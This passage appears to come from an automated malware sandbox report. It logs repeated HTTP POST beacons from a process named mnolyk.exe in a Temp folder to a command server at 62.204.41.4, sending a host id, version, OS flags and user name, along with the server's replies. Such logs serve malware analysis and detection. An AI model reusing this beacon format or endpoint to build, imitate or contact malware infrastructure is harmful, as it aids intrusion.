                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:04.100559950 CET850INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          696192.168.2.65042162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:04.274056911 CET851OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:04.338717937 CET851INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          697192.168.2.65042262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:04.527765036 CET852OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:04.591325045 CET852INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          698192.168.2.65042362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:04.774413109 CET853OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:04.839099884 CET853INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          699192.168.2.65042462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:05.016891003 CET854OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:05.080219030 CET854INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          7192.168.2.64972562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:52.567466974 CET112OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:52.634872913 CET112INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          70192.168.2.64979062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:10.237145901 CET190OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:10.300898075 CET190INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          700192.168.2.65042562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:05.253500938 CET855OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:05.317790985 CET855INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          701192.168.2.65042662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:05.502600908 CET856OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:05.567068100 CET856INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          702192.168.2.65042762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:05.737323999 CET857OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:05.800420046 CET857INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          703192.168.2.65042862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:05.975694895 CET858OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:06.039757967 CET858INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          704192.168.2.65042962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:06.205612898 CET859OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:06.270401001 CET859INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          705192.168.2.65043062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:06.494424105 CET860OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:06.559781075 CET860INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          706192.168.2.65043162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:06.742108107 CET861OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:06.807320118 CET861INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          707192.168.2.65043262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:06.987942934 CET862OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:07.053987026 CET862INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          708192.168.2.65043362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:07.254487991 CET863OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:07.319380045 CET863INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          709192.168.2.65043462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:07.488023043 CET864OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:07.553051949 CET864INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          71192.168.2.64979162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:10.547143936 CET191OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:10.610843897 CET191INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          710192.168.2.65043562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:07.721879005 CET865OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:07.789803028 CET865INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          711192.168.2.65043662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:07.968971014 CET866OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:08.034284115 CET866INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          712192.168.2.65043762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:08.206569910 CET867OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:08.270641088 CET867INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          713192.168.2.65043862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:08.447685957 CET868OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
